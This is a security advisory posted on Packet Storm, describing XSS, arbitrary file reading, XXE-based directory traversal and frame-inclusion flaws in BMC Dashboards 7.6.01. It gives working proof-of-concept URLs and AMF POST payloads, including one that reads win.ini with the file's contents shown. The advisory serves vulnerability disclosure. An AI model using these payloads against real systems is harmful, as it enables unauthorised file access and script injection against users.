exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BMC Dashboards 7.6.01 XSS / File Reading

BMC Dashboards 7.6.01 XSS / File Reading
Posted May 5, 2011
Authored by ProCheckUp, Richard Brain, Jan Fry | Site procheckup.com

BMC Dashboards version 7.6.01 suffers from cross site scripting and arbitrary file reading vulnerabilities.

tags | exploit, arbitrary, vulnerability, xss
SHA-256 | 94e598cb8a417f4029046945b2b6cbe27cca569b5151f8df4790880703c96972

BMC Dashboards 7.6.01 XSS / File Reading

Change Mirror Download
PR10-18: Multiple XSS (Cross Site Scripting) and arbitrary file reading
flaws within BMC Dashboards by BMC

Vulnerability found: 1st Oct 2010

Vendor informed:

Vulnerability fixed:

Severity: High

Description:

BMC Dashboards provides service desk analysts with a dashboard view of
aggregated performance indicators, enabling timely fact based decisions.
ProCheckUp has discovered that multiple Remedy Knowledge Management
pages are vulnerable to reflective XSS attacks, along with a directory
traversal vulnerability which allows arbitrary files to be read outside
the web-root.

Version: 7.6.01 - http://www.bmc.com/

1) The following demonstrate the reflective XSS flaw

a)
https://target-domain.foo/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm

b)
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>

c) multiple XSS within demo pages
https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>

https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean

d) Multiple XSS as the AMF stream is unfiltered

POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58..... ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation

bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#. name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade

results:-
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651

......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber

codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d

Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to Remedy Knowledge
Management based site. Such code would run within the security context
of the target domain. This type of attack can result in non-persistent
defacement of the target site, or the redirection of confidential
information (i.e.: session IDs) to unauthorised third parties. No
authentication is required to exploit this vulnerability.

2) Application is vulnerable to file source code reading limited to the
web-root.

https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml

Consequences:
File source code reading allows Files to be retrieved from the target
server, provided that the location on the file system is known. No
authentication is required to exploit this vulnerability.

3) Verbose error pages - when parsing malicious amf messages
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Host: target-domain.foo
Content-Type: application/x-amf
Content-Length: 462

COflex.messaging.messages.RemotingMessagetimestampheadersoperation body
sourceremotePasswordremoteUsernameparametersmessageIdtimeToLiveclientIddestination

SIflex.messaging.messages.ErrorMessageheadersrootCause bodycorrelationIdfaultDetailfaultStringclientIdtimeToLivedestinationtimestampextendedDatafaultCodemessageId

acom.bmc.bsm.dashboards.util.logging.BSDExceptionmessage guid!localizedMessage causeargumentsprioritytracebackerrorCodecauseSummarySystem
error. Contact your system administrator for assistance.
Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifierAdZZZZZZZZJIiCvq53w9q0gerq4j8y0n80
3;java.io.FileNotFoundException"$?cf:\Program Files\BMC
Software\BMCDashboardsForBSM\BSMDashboards\archive\208Archive_1.025350<a>d026634a338.dar
(The filename, directory name, or volume label syntax is
incorrect): ERRORÇecom.bmc.bsm.dashboards.util.logging.BSDException: System
error. Contact your system administrator for assistance.
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchiveHelper(DashboardArchiveFacadeImpl.java:585)
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchive(DashboardArchiveFacadeImpl.java:526)
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.getUndefinedDataSources(DashboardArchiveFacadeImpl.java:193)
at sun.reflect.GeneratedMethodAccessor767.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl$1.run(TransactionInvocationHandlerImpl.java:66)
at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:117)
at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:107)
at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl.invoke(TransactionInvocationHandlerImpl.java:60)
at $Proxy54.getUndefinedDataSources(Unknown Source)


4) Vulnerable to directory traversal as uses Adobe BlazeDS, breaking
out of the webroot see http://seclists.org/fulldisclosure/2010/Feb/383

POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1

Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10)
Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C)
Content-type: application/x-amf

POST DATA
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "../win.ini"> ]>
<amfx ver="3"><body>
<object type="flex.messaging.messages.CommandMessage">
<traits>

<string>body</string><string>clientId</string><string>correlationId</string>

<string>destination</string><string>headers</string><string>messageId</string>

<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>


win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo

Consequences:
Directory traversal allows Files to be retrieved from the target server
outside the webroot, provided that the location on the file system is
known. Arbitrary file uploading should also be possible, no
authentication is required to exploit this vulnerability.

5) Application is vulnerable to remote frame inclusion

https://target-domain.foo/bmc_help2u/help_services/html/index.htm?&URL=http://www.procheckup.com

Consequences:
An attacker may be able to gain access to confidential data, by carry
out a phishing attack.

Fix:

References:
http://www.procheckup.com/Vulnerabilities.php

Credits: Richard Brain and Jan Fry of ProCheckUp Ltd (www.procheckup.com)

Legal:
Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.


Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close